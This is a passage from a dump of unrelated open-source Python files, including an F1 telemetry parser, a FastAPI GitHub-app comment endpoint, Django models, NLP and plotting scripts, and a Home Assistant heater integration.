player_car_index = self.m_header.m_player_car_index
player_values = (
self.m_header.__dict__
| self.m_carStatusData[player_car_index].__dict__.copy()
)
return player_values
@dataclass
class CarDamageData:
"""CarStatusData struct."""
m_tyresWear: ctypes.c_float
m_tyresDamage: ctypes.c_uint8
m_brakesDamage: ctypes.c_uint8
@classmethod
def from_unpacked(cls, unpacked: List):
"""Parse unpacked struct into class attributes.
Args:
unpacked (list): Unpacked struct containing all
attributes to construct CarTelemetryData class.
"""
return cls(
list([unpacked[0], unpacked[1], unpacked[2], unpacked[3]]),
list([unpacked[4], unpacked[5], unpacked[6], unpacked[7]]),
list([unpacked[8], unpacked[9], unpacked[10], unpacked[11]]),
)
@dataclass
class PacketCarDamageData(PacketWOAdditionalAttributes):
"""PacketCarStatusData struct."""
m_carDamageData: List[CarDamageData]
@classmethod
def from_binary(cls, packet_header: PacketHeader, binary_message: str):
"""Create class form binary UDP package.
Args:
packet_header (PacketHeader): PacketHeader class.
binary_message (str): Binary representation of struct.
"""
car_damage_data_list = cls.get_message_list(
packet_header, binary_message, CAR_DAMAGE_DATA_FORMAT, CarDamageData
)
return cls(packet_header, car_damage_data_list)
def get_player_car_data(self) -> dict:
"""Get data from player car."""
player_car_index = self.m_header.m_player_car_index
player_car_damage = self.m_carDamageData[player_car_index]
player_car_damage_message = (
self.m_header.__dict__ | player_car_damage.__dict__.copy()
)
# Map tyre wear values from list to attributes
player_car_damage_message = (
player_car_damage_message
| _telemetry_list_to_attributes(
player_car_damage_message["m_tyresWear"],
"m_tyresWear",
)
)
player_car_damage_message.pop("m_tyresWear")
# Map tyre damage values from list to attributes
player_car_damage_message = (
player_car_damage_message
| _telemetry_list_to_attributes(
player_car_damage_message["m_tyresDamage"],
"m_tyresDamage",
)
)
player_car_damage_message.pop("m_tyresDamage")
# Map brake damage values from list to attributes
player_car_damage_message = (
player_car_damage_message
| _telemetry_list_to_attributes(
player_car_damage_message["m_brakesDamage"],
"m_brakesDamage",
)
)
player_car_damage_message.pop("m_brakesDamage")
return player_car_damage_message
| 2.9375 | 3 |
src/trace_set/transform.py | ccberg/LA | 1 | 12797535 | <filename>src/trace_set/transform.py
import numpy as np
from src.dlla.hw import prepare_traces_dl
from tensorflow.python.keras.utils.np_utils import to_categorical
# TODO replace with mlp_hw notebook variants
from src.tools.dl import encode
from src.tools.la import balance
from src.trace_set.database import Database
from src.trace_set.pollution import PollutionType, Pollution
from src.trace_set.set_hw import TraceSetHW
def reduce_fixed_fixed(x, y, balanced=False):
"""
Takes 9-class (categorical) hamming weight labels and reduces it to 2 semi-fixed classes.
"""
hamming_weight = np.argmax(y, axis=1)
filter_ixs = hamming_weight != 4
is_high = hamming_weight[filter_ixs] > 4
traces, la_bit = x[filter_ixs], is_high
if balanced:
traces, la_bit = balance(traces, la_bit)
return traces, encode(la_bit, 2)
def reduce_fixed_random(x, y, balanced=False):
"""
Takes 9-class (categorical) hamming weight labels and reduces it to 2 classes: semi-fixed and random.
"""
hamming_weight = np.argmax(y, axis=1)
is_random = np.random.binomial(1, .5, len(x)).astype(bool)
filter_ixs = np.logical_or(hamming_weight < 4, is_random)
traces, la_bit = x[filter_ixs], is_random[filter_ixs]
if balanced:
traces, la_bit = balance(traces, la_bit)
return traces, encode(la_bit, 2)
if __name__ == '__main__':
trace_set = TraceSetHW(Database.ascad, Pollution(PollutionType.gauss, 0), limits=(1000, 1000))
x9, y9, x9_att, y9_att = prepare_traces_dl(*trace_set.profile(), *trace_set.attack())
x2, y2 = reduce_fixed_fixed(x9, y9, balanced=True)
print(x2) | 2.234375 | 2 |
app/api/index.py | awtkns/openapi-perf-action | 0 | 12797536 | import os
from fastapi import FastAPI, HTTPException
from github3.exceptions import NotFoundError, ForbiddenError
from github3.github import GitHub
from github3.pulls import PullRequest
from pydantic import BaseModel
GITHUB_PRIVATE_KEY = os.environ.get('APP_PRIVATE_KEY', None)
GITHUB_APP_IDENTIFIER = os.environ.get('APP_IDENTIFIER', None)
if not GITHUB_PRIVATE_KEY:
GITHUB_PRIVATE_KEY = open('private-key.pem', 'rt').read()
app = FastAPI()
class ActionIn(BaseModel):
content: str
owner: str
repository: str
pr_number: int
@property
def repo(self) -> str:
return f'{self.owner}/{self.repository}'
@app.post('/comment')
def comment_on_pr(action: ActionIn):
gh = login_as_installation(action)
get_pr(gh, action).create_comment(action.content)
return "Post Success", 200
@app.post('/reaction')
def react_to_pr(action: ActionIn):
gh = login_as_installation(action)
issue = get_pr(gh, action).issue()
issue._post(
issue._api + '/reactions',
data={"content": action.content},
headers={'Accept': 'application/vnd.github.squirrel-girl-preview+json'}
)
return "Post Success", 200
def login_as_installation(action: ActionIn):
try:
gh = GitHub()
gh.login_as_app(GITHUB_PRIVATE_KEY.encode(), GITHUB_APP_IDENTIFIER)
install = gh.app_installation_for_repository(action.owner, action.repository)
gh.login_as_app_installation(
GITHUB_PRIVATE_KEY.encode(),
GITHUB_APP_IDENTIFIER,
install.id
)
return gh
except NotFoundError:
raise HTTPException(404, f"OpeAPI Perf App not installed to {action.repo}")
def get_pr(gh, action: ActionIn) -> PullRequest:
try:
return gh.pull_request(
owner=action.owner,
repository=action.repository,
number=action.pr_number
)
except ForbiddenError:
raise HTTPException(403, f"Application not setup for the repository {action.repo}")
except NotFoundError:
raise HTTPException(404, f"PR #{action.pr_number} does not exist in {action.repo}")
| 2.21875 | 2 |
ml_scraping/src/NLTK/tutorial/lemmatizing.py | josetorrs/thee-flying-chicken | 2 | 12797537 | from nltk.stem import WordNetLemmatizer
lemmatizer = WordNetLemmatizer()
'''
print(lemmatizer.lemmatize("cacti"))
print(lemmatizer.lemmatize("geese"))
print(lemmatizer.lemmatize("rocks"))
print(lemmatizer.lemmatize("python"))
'''
#default pos="n"(noun)
#"a" = adjective, "v" = verb
#lemmas give back actual words, usually better then stemmers
print(lemmatizer.lemmatize("better", pos="a"))
print(lemmatizer.lemmatize("best", pos="a"))
print(lemmatizer.lemmatize("run", pos="v"))
print(lemmatizer.lemmatize("run"))
| 3.4375 | 3 |
portfolio/models.py | Marcos8060/Django-Gallery-Website | 0 | 12797538 | from django.urls import reverse
from django.db import models
# Create your models here
class Location(models.Model):
name = models.CharField(max_length=60)
def __str__(self):
return self.name
class Category(models.Model):
name = models.CharField(max_length=200)
slug = models.SlugField(unique=True)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('gallery_list',args=[self.slug])
class Image(models.Model):
location = models.ForeignKey(Location,on_delete=models.CASCADE) # one image belongs to a single location
category = models.ForeignKey(Category,on_delete=models.CASCADE) # one image belongs to a single category
name= models.CharField(max_length=200)
description = models.TextField(max_length=300)
image = models.ImageField(upload_to = 'articles/',blank=True)
def get_absolute_url(self):
return reverse('gallery_detail',args=[self.id])
| 2.609375 | 3 |
diplomacy_research/models/datasets/feedable_dataset.py | wwongkamjan/dipnet_press | 39 | 12797539 | <filename>diplomacy_research/models/datasets/feedable_dataset.py
# ==============================================================================
# Copyright 2019 - <NAME>
#
# NOTICE: Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# ==============================================================================
""" Feedable Dataset
- Abstract class responsible for feeding data inside a model
"""
from abc import ABCMeta, abstractmethod
import logging
import numpy as np
from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField
from diplomacy_research.utils.model import pad_list
# Constants
LOGGER = logging.getLogger(__name__)
class FeedableDataset(metaclass=ABCMeta):
""" This object is a generic feedable dataset """
def __init__(self, dataset_builder, cluster_config=None):
""" Constructor
:param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods
:param cluster_config: Optional. If set, the cluster configuration will be used for distributed training.
:type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder
:type cluster_config: diplomacy_research.utils.cluster.ClusterConfig
"""
self.dataset_builder = dataset_builder
self.cluster_config = cluster_config
self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields)
self.default_features = {} # Will be used as default if features are missing
self.session = None
self.iterator = None
self._is_started = False
self._is_initialized = False
self._is_closing = False
def __del__(self):
""" Destructor """
self.close()
@property
def can_support_iterator(self):
""" Determines if the dataset can support an iterator or if it is a remote (RPC) dataset """
raise NotImplementedError()
@property
def is_started(self):
""" Determines if the dataset has been started """
return self._is_started
@property
def is_initialized(self):
""" Determines if the iterator is initialized """
return self._is_initialized
@property
def is_closing(self):
""" Determines if the dataset is closing """
return self._is_closing
@abstractmethod
def build(self):
""" Builds the dataset """
raise NotImplementedError()
@abstractmethod
def start(self, session):
""" Starts the dataset
:param session: The TensorFlow session to use.
:type session: tensorflow.python.client.session.Session
"""
raise NotImplementedError()
@abstractmethod
def initialize(self, session):
""" Initializes the dataset (and its iterator)
:param session: The TensorFlow session to use.
:type session: tensorflow.python.client.session.Session
"""
raise NotImplementedError()
def get_feedable_item(self, *args, **kwargs):
""" Calls the dataset_builder get_feedable_item """
return self.dataset_builder.get_feedable_item(*args, **kwargs)
def prepare_item(self, item):
""" Makes sure the item respects the required protofields and casts/pads the item accordingly """
# Checking all features in items, padding them and converting them to the right dtype
for feature in item:
assert feature in self.proto_fields, 'Feature %s is not in proto fields.' % feature
proto_field = self.proto_fields[feature]
# Converting sets to lists
if isinstance(item[feature], set):
item[feature] = list(item[feature])
# Var Len - Converting and flattening
# Scalar - Just converting
# Fixed Len - Padding and converting
if proto_field.dtype is None:
continue
elif isinstance(proto_field, VarProtoField):
item[feature] = np.array(item[feature], proto_field.dtype).flatten()
elif not proto_field.shape:
item[feature] = np.array(item[feature], proto_field.dtype)
elif isinstance(proto_field, FixedProtoField):
item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype)
# Returning item
return item
@abstractmethod
def get_results(self, queue_name, item, retry_on_failure=True, **kwargs):
""" Computes the outputs of a name using item as inout
:param queue_name: The name of the queue where to put the item
:param item: A dictionary with the fields required for that queue
:param retry_on_failure: Boolean that indicates to retry querying from the model if an error is encountered.
:return: A tornado.concurrent.Future that will be set with the results when they become available
"""
raise NotImplementedError()
@staticmethod
def make_session_run_hook():
""" Builds a SessionRunHook for the MonitoredTrainingSession object """
def close(self):
""" Stops the dataset """
self._is_closing = True
| 2.03125 | 2 |
Image/Analysis.py | fox-ahri/image | 0 | 12797540 | from PIL import ImageFont
def analysis(obj):
params = dict()
params['size'] = size(obj)
params['rgb'] = color(obj)
params['lines'] = line(obj)
params['ellipses'] = ellipse_and_rectangle(obj, 'ellipses')
params['rectangles'] = ellipse_and_rectangle(obj, 'rectangles')
params['texts'] = text(obj)
params['store'] = store(obj)
params['point'] = point(obj)
params['opacity'] = opacity(obj)
params['original'] = o if (o := obj.get('original')) else False
params['colour'] = colour(obj)
params['album'] = album(obj)
return params
def opacity(obj):
if a := o if (o := obj.get('a')) else None:
return op if 0 <= (op := int(a)) <= 255 else None
return None
def album(obj):
data = params.split(',') if (params := obj.get('album')) else None
if data and len(data) >= 2:
return [data[0], data[1]]
return None
def colour(obj):
data = params.split(',') if (params := obj.get('colour')) else None
if data and len(data) >= 7:
return [int(data[0]), (int(data[1]), int(data[2]), int(data[3])), (int(data[4]), int(data[5]), int(data[6]))]
return None
def store(obj):
bg = None if not obj.get('store') else obj.get('store').split(',')
if bg:
if len(bg) >= 2:
bg_args = [bg[0], bg[1]]
return bg_args
if len(bg) >= 1:
bg_args = [bg[0], '0']
return bg_args
else:
return None
def point(obj):
return None if not obj.get('point') else float(obj.get('point'))
def size(obj):
width = int(obj.get('width') or obj.get('w') or '400')
height = int(obj.get('height') or obj.get('h') or '300')
return width, height
def color(obj):
rgb = (obj.get('rgb') or '200,200,200').split(',')
rgb[0] = rgb[0] if not obj.get('r') else obj.get('r')
rgb[1] = rgb[1] if not obj.get('g') else obj.get('g')
rgb[2] = rgb[2] if not obj.get('b') else obj.get('b')
return int(rgb[0]), int(rgb[1]), int(rgb[2])
def line(obj):
lines = list()
if lines_args := obj.get('lines'):
line_args = lines_args.split(';')
for i in line_args:
try:
line_arg = i.split(',')
if len(line_arg) >= 7:
lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])),
(int(line_arg[4]), int(line_arg[5]), int(line_arg[6]))])
elif len(line_arg) >= 4:
lines.append([(int(line_arg[0]), int(line_arg[1]), int(line_arg[2]), int(line_arg[3])), (0, 0, 0)])
except Exception as ex:
print(str(ex))
return lines
def ellipse_and_rectangle(obj, shape):
shapes = list()
if shapes_args := obj.get(shape):
shape_args = shapes_args.split(';')
for i in shape_args:
try:
shape_arg = i.split(',')
if len(shape_arg) >= 10:
shapes.append(
[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),
(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),
(int(shape_arg[7]), int(shape_arg[8]), int(shape_arg[9]))])
elif len(shape_arg) >= 7:
shapes.append(
[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),
(int(shape_arg[4]), int(shape_arg[5]), int(shape_arg[6])),
(0, 0, 0)])
elif len(shape_arg) >= 4:
shapes.append(
[(int(shape_arg[0]), int(shape_arg[1]), int(shape_arg[2]), int(shape_arg[3])),
(0, 0, 0), (0, 0, 0)])
except Exception as ex:
print(str(ex))
return shapes
def text(obj):
texts = list()
if texts_args := obj.get('texts'):
text_args = texts_args.split(';')
# ttf = '/home/ahri/code/AhriImage/Image/font.ttf'
ttf = '/project/Image/font.ttf'
for i in text_args:
text_arg = i.split(',')
if len(text_arg) >= 7:
texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],
(int(text_arg[3]), int(text_arg[3]), int(text_arg[5])),
ImageFont.truetype(ttf, int(text_arg[6]))])
elif len(text_arg) >= 6:
texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2],
(int(text_arg[3]), int(text_arg[3]), int(text_arg[5])),
ImageFont.truetype(ttf, 30)])
if len(text_args) >= 3:
texts.append([(int(text_arg[0]), int(text_arg[1])), text_arg[2], (0, 0, 0),
ImageFont.truetype(ttf, 30)])
return texts
| 2.875 | 3 |
pythonoffice/ppt_get.py | YEZHIAN1996/pythonstudy | 1 | 12797541 | <filename>pythonoffice/ppt_get.py<gh_stars>1-10
from pptx import Presentation
p = Presentation('a.pptx')
for slide in p.slides:
for shape in slide.shapes:
if shape.has_text_frame:
print(shape.text_frame.text)
if shape.has_table:
for cell in shape.table.iter_cells():
print(cell.text)
| 2.953125 | 3 |
old_code/datawrangle.py | Napam/Stockybocky | 2 | 12797542 | '''Combines oslo bors and yahoo data'''
import numpy as np
import pandas as pd
from pprint import pprint
import scrapeconfig as cng
def merge_bors_and_yahoo_dfs(bors_name: str, yahoo_name: str, result_filename: str):
'''
Get filenames for csv files from Oslo Bors and Yahoo Finance and merges them
to one large dataset.
'''
df_bors = pd.read_csv(bors_name)
df_stats = pd.read_csv(yahoo_name)
# Some of the features from Yahoo Finance
# are very sparse, so here I am picking the ones
# that are not so sparse and that I FEEL makes
# makes sense to include.
df_stats = df_stats[cng.SELECTED_FEATURES]
df_combined = pd.merge(df_bors, df_stats, on=cng.MERGE_DFS_ON)
df_combined.set_index(cng.MERGE_DFS_ON, inplace=True)
df_combined.to_csv(cng.FINALDATASET_FILENAME)
if __name__ == '__main__':
merge_bors_and_yahoo_dfs(cng.BORS_CSV_NAME, cng.YAHOO_CSV_NAME, cng.FINALDATASET_FILENAME)
| 3.0625 | 3 |
co-occurrence_matrix.py | fanglala997/test | 0 | 12797543 | <filename>co-occurrence_matrix.py
import matplotlib
import fileDispose
import numpy as np
def get_bench(text,n):
"""
get_bench(list,int)
共现矩阵窗口循环的范围,对联选择上下联两句做循环范围
text:文本列表
n:几句话合并
"""
bench = []
lable = 0
for i in range(len(text)):
if(i % n == 0):
lable = i
continue
else:
text[lable].extend(text[i])
bench.append(text[lable])
return bench
def co_occurrence_matrix_for_word(window,text,word_listindex):
re_matrix =np.zeros((len(word_listindex),len(word_listindex)),dtype=int)
bench = get_bench(text,2)
for sentence in bench:
for i in range(len(sentence)):
for j in range(1,window+1):
if(i-j >= 0):
n = int(word_listindex[sentence[i-j]])
re_matrix[i,n] += 1
if(i+j <= len(sentence)):
n = int(word_listindex[sentence[i+j-1]])
re_matrix[i,n] += 1
else:
continue
return re_matrix
total_list = fileDispose.getFile('total_list.json')
word_listindex = fileDispose.getFile('allcut_word_listindex.json')
co_occurrence = co_occurrence_matrix_for_word(2,total_list,word_listindex)
# fileDispose.writeToFile(co_occurrence.tolist(),'./Data/train/co_occurrence.json')
np.savetxt('./Data/train/co_occurrence.txt',co_occurrence)
# print(co_occurrence[:,1])
# bench = get_bench(total_list,2)
# print(bench[:10])
# danzi = 0
# shuangzi = 0
# qita = 0
# for k in word_listindex:
# if (len(word_listindex[k]) == 1):
# danzi += 1
# elif (len(word_listindex[k]) == 2):
# shuangzi += 1
# else:
# qita += 1
# print('单个字词个数:',danzi)
# print('双字词个数:',shuangzi)
# print('其他字词个数:',qita)
# for i, (k, v) in enumerate(word_listindex.items()):
# if i in range(0, 10):
# print(k, v) | 2.8125 | 3 |
scripts/plot_performance.py | shercklo/LTO-CMA | 7 | 12797544 | <reponame>shercklo/LTO-CMA
import os
import json
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
import argparse
from datetime import datetime
sns.set()
from matplotlib import rcParams
rcParams["font.size"] = "40"
rcParams['text.usetex'] = False
rcParams['font.family'] = 'serif'
rcParams['figure.figsize'] = (16.0, 9.0)
rcParams['figure.frameon'] = True
rcParams['figure.edgecolor'] = 'k'
rcParams['grid.color'] = 'k'
rcParams['grid.linestyle'] = ':'
rcParams['grid.linewidth'] = 0.5
rcParams['axes.linewidth'] = 3
rcParams['axes.edgecolor'] = 'k'
rcParams['axes.grid.which'] = 'both'
rcParams['legend.frameon'] = 'True'
rcParams['legend.framealpha'] = 1
rcParams['legend.fontsize'] = 30
rcParams['ytick.major.size'] = 32
rcParams['ytick.major.width'] = 6
rcParams['ytick.minor.size'] = 6
rcParams['ytick.minor.width'] = 1
rcParams['xtick.major.size'] = 32
rcParams['xtick.major.width'] = 6
rcParams['xtick.minor.size'] = 6
rcParams['xtick.minor.width'] = 1
rcParams['xtick.labelsize'] = 32
rcParams['ytick.labelsize'] = 32
def dir_path(path):
if os.path.isfile(path):
return path
else:
raise argparse.ArgumentTypeError("readable_dir:%s is not a valid path to a file"% path)
parser = argparse.ArgumentParser(description='Script to plot LTO test data.')
parser.add_argument('--lto_path', type=dir_path, help="Path to the LTO data file.",
default=os.path.join("..","examples","10BBOB","GallaghersGaussian21hi_LTO.json"))
parser.add_argument('--csa_path', type=dir_path, help="Path to the CSA data file.",
default=os.path.join("..","data","PPSN_LTO_Data","CSA_Data","CSA_Plots_10D","GallaghersGaussian21hi.json"))
parser.add_argument('--function', type=str, help="Function being plotted",
default="GallaghersGaussian21hi")
args = parser.parse_args()
lto_path = args.lto_path
csa_path = args.csa_path
function = args.function
popsize = 10
data_LTO = {}
data_CSA = {}
with open(lto_path) as json_file:
data_LTO = json.load(json_file)
with open(csa_path) as json_file:
data_CSA = json.load(json_file)
generations = len(data_LTO["Average costs LTO"])
num_feval = generations * popsize
plt.tick_params(axis='x', which='minor')
plt.legend(loc=0, fontsize=25, ncol=2)
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Step Size", fontsize=50)
plt.xticks(np.arange(start=1, stop=generations, step=generations//5),
[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])
plt.xticks()
plt.title(function)
plt.fill_between(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)),
np.subtract(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
np.add(data_LTO["Sigma LTO"], data_LTO["Std Sigma LTO"]),
color=sns.xkcd_rgb["magenta"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_LTO["Sigma LTO"]) + 1)), data_LTO["Sigma LTO"], linewidth=4,
label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)),
np.subtract(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
np.add(data_CSA["Sigma CSA"], data_CSA["Std Sigma CSA"]),
color=sns.xkcd_rgb["green"], alpha=0.1)
plt.plot(list(np.arange(1, len(data_CSA["Sigma CSA"]) + 1)), data_CSA["Sigma CSA"], linewidth=4,
label="CSA", color=sns.xkcd_rgb["green"])
plt.legend()
type = "StepSize"
output_path = os.path.join("..","plots")
os.makedirs(output_path, exist_ok=True)
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
plt.tick_params(axis='x', which='minor')
plt.legend(loc=0, fontsize=25, ncol=2)
plt.xlabel("Num FEval", fontsize=50)
plt.ylabel("Objective Value", fontsize=50)
plt.xscale("log")
plt.title(function)
plt.xticks(np.arange(start=1, stop=generations, step=generations//5),
[str(10)] + [str(gen * 10) for gen in np.arange(start=10, stop=generations, step=generations//5)])
plt.fill_between(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)),
np.subtract(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]),
np.add(data_LTO["Average costs LTO"], data_LTO["Std costs LTO"]), alpha=0.1,
color=sns.xkcd_rgb["magenta"])
plt.plot(list(np.arange(1, len(data_LTO["Average costs LTO"]) + 1)), data_LTO["Average costs LTO"],
linewidth=4, label="LTO", color=sns.xkcd_rgb["magenta"])
plt.fill_between(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)),
np.subtract(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]),
np.add(data_CSA["Average costs CSA"], data_CSA["Std costs CSA"]), alpha=0.1,
color=sns.xkcd_rgb["green"])
plt.plot(list(np.arange(1, len(data_CSA["Average costs CSA"]) + 1)), data_CSA["Average costs CSA"],
linewidth=4, label="CSA", color=sns.xkcd_rgb["green"])
plt.legend()
type = "ObjectiveValue"
timestamp = datetime.now()
time = str(timestamp)
plot_file = ('Plot_%s_%s_%s.pdf' % (type, function, time))
plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')
plt.clf()
| 2.0625 | 2 |
cpdb/analytics/migrations/0004_alter_searchtracking_query_type.py | invinst/CPDBv2_backend | 25 | 12797545 | <reponame>invinst/CPDBv2_backend<gh_stars>10-100
# Generated by Django 2.1.3 on 2018-11-23 08:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('analytics', '0003_searchtracking'),
]
operations = [
migrations.AlterField(
model_name='searchtracking',
name='query_type',
field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20),
),
]
| 1.445313 | 1 |
LaureatsBackEnd-master/laureats/migrations/0008_etudiant.py | SanaaCHAOU/laureat_management_ENSAT | 0 | 12797546 | <filename>LaureatsBackEnd-master/laureats/migrations/0008_etudiant.py
# Generated by Django 3.0.2 on 2020-01-10 20:43
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('laureats', '0007_laureat_filiere'),
]
operations = [
migrations.CreateModel(
name='Etudiant',
fields=[
('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')),
('etablissement', models.CharField(default='', max_length=100)),
('sujet_etude', models.CharField(default='', max_length=255)),
('new_date_inscription', models.DateField()),
],
options={
'ordering': ['new_date_inscription'],
},
bases=('laureats.laureat',),
),
]
| 1.570313 | 2 |
spanmb/models/span_extractor.py | zmmzGitHub/SpanMB_BERT | 0 | 12797547 | <filename>spanmb/models/span_extractor.py
import torch
from torch.nn.parameter import Parameter
from overrides import overrides
from allennlp.modules.span_extractors.span_extractor import SpanExtractor
from allennlp.modules.token_embedders.embedding import Embedding
from allennlp.nn import util
from allennlp.common.checks import ConfigurationError
class MaxSpanExtractor(SpanExtractor):
def __init__(
self,
input_dim: int,
num_width_embeddings: int = None,
span_width_embedding_dim: int = None,
bucket_widths: bool = False,
) -> None:
super().__init__()
self._input_dim = input_dim
self._num_width_embeddings = num_width_embeddings
self._bucket_widths = bucket_widths
if num_width_embeddings is not None and span_width_embedding_dim is not None:
self._span_width_embedding = Embedding(
num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim
)
elif num_width_embeddings is not None or span_width_embedding_dim is not None:
raise ConfigurationError(
"To use a span width embedding representation, you must"
"specify both num_width_buckets and span_width_embedding_dim."
)
else:
self._span_width_embedding = None
def get_input_dim(self) -> int:
return self._input_dim
def get_output_dim(self) -> int:
if self._span_width_embedding is not None:
return self._input_dim + self._span_width_embedding.get_output_dim()
return self._input_dim
@overrides
def forward(
self,
sequence_tensor: torch.FloatTensor,
span_indices: torch.LongTensor,
sequence_mask: torch.BoolTensor = None,
span_indices_mask: torch.BoolTensor = None,
) -> None:
# shape (batch_size, num_spans)
span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)]
if span_indices_mask is not None:
# It's not strictly necessary to multiply the span indices by the mask here,
# but it's possible that the span representation was padded with something other
# than 0 (such as -1, which would be an invalid index), so we do so anyway to
# be safe.
span_starts = span_starts * span_indices_mask
span_ends = span_ends * span_indices_mask
# [batch_size, span_num, max_span_width, emb_size]
span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices)
# set unmask embeddings to 0
span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float()
# [batch_size, span_num, emb_size]
span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask
if self._span_width_embedding is not None:
# Embed the span widths and concatenate to the rest of the representations.
if self._bucket_widths:
span_widths = util.bucket_values(
span_ends - span_starts, num_total_buckets=self._num_width_embeddings
)
else:
span_widths = span_ends - span_starts
span_width_embeddings = self._span_width_embedding(span_widths)
span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1)
if span_indices_mask is not None:
return span_max_embeddings * span_indices_mask.unsqueeze(-1)
return span_max_embeddings
| 2.328125 | 2 |
Curso Python Completo - Udemy/Teste/conjuntos.py | Cauenumo/Python | 0 | 12797548 | <gh_stars>0
s = set()
s.add(2)
print(s)
| 1.71875 | 2 |
custom_components/goldair_climate/heater/climate.py | KiLLeRRaT/homeassistant-goldair-climate | 0 | 12797549 | """
Goldair WiFi Heater device.
"""
import logging
import json
from homeassistant.const import (
ATTR_TEMPERATURE, TEMP_CELSIUS, STATE_UNAVAILABLE
)
from homeassistant.components.climate import ClimateDevice
from homeassistant.components.climate.const import (
ATTR_HVAC_MODE, ATTR_PRESET_MODE,
HVAC_MODE_OFF, HVAC_MODE_HEAT,
SUPPORT_TARGET_TEMPERATURE, SUPPORT_PRESET_MODE, SUPPORT_SWING_MODE
)
from custom_components.goldair_climate import GoldairTuyaDevice
_LOGGER = logging.getLogger(__name__)
ATTR_TARGET_TEMPERATURE = 'target_temperature'
ATTR_CHILD_LOCK = 'child_lock'
ATTR_FAULT = 'fault'
ATTR_POWER_MODE_AUTO = 'auto'
ATTR_POWER_MODE_USER = 'user'
ATTR_POWER_LEVEL = 'power_level'
ATTR_DISPLAY_ON = 'display_on'
ATTR_POWER_MODE = 'power_mode'
ATTR_ECO_TARGET_TEMPERATURE = 'eco_' + ATTR_TARGET_TEMPERATURE
STATE_COMFORT = 'Comfort'
STATE_ECO = 'Eco'
STATE_ANTI_FREEZE = 'Anti-freeze'
PROPERTY_TO_DPS_ID = {
ATTR_HVAC_MODE: '1',
ATTR_TARGET_TEMPERATURE: '2',
ATTR_TEMPERATURE: '3',
ATTR_PRESET_MODE: '4',
ATTR_CHILD_LOCK: '6',
ATTR_FAULT: '12',
ATTR_POWER_LEVEL: '101',
ATTR_DISPLAY_ON: '104',
ATTR_POWER_MODE: '105',
ATTR_ECO_TARGET_TEMPERATURE: '106'
}
# GOLDAIR GECO270
PROPERTY_TO_DPS_ID_GECO270 = {
ATTR_HVAC_MODE: '1',
ATTR_TARGET_TEMPERATURE: '3',
ATTR_TEMPERATURE: '4',
ATTR_PRESET_MODE: '5',
ATTR_CHILD_LOCK: '2',
ATTR_FAULT: '12',
ATTR_POWER_LEVEL: '101',
ATTR_DISPLAY_ON: '104',
ATTR_POWER_MODE: '105',
ATTR_ECO_TARGET_TEMPERATURE: '106'
}
HVAC_MODE_TO_DPS_MODE = {
HVAC_MODE_OFF: False,
HVAC_MODE_HEAT: True
}
PRESET_MODE_TO_DPS_MODE = {
STATE_COMFORT: 'C',
STATE_ECO: 'ECO',
STATE_ANTI_FREEZE: 'AF'
}
POWER_LEVEL_TO_DPS_LEVEL = {
'Stop': 'stop',
'1': '1',
'2': '2',
'3': '3',
'4': '4',
'5': '5',
'Auto': 'auto'
}
SUPPORT_FLAGS = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE | SUPPORT_SWING_MODE
class GoldairHeater(ClimateDevice):
"""Representation of a Goldair WiFi heater."""
def __init__(self, device):
"""Initialize the heater.
Args:
name (str): The device's name.
device (GoldairTuyaDevice): The device API instance."""
self._device = device
self._support_flags = SUPPORT_FLAGS
self._TEMPERATURE_STEP = 1
self._TEMPERATURE_LIMITS = {
STATE_COMFORT: {
'min': 5,
'max': 37
},
STATE_ECO: {
'min': 5,
'max': 21
}
}
# self._model = model
# _LOGGER.info(f'Setting model to {model}')
@property
def get_property_to_dps_id(self):
"""Get the correct PROPERTY_TO_DPS_ID depending on the model of the heater you have"""
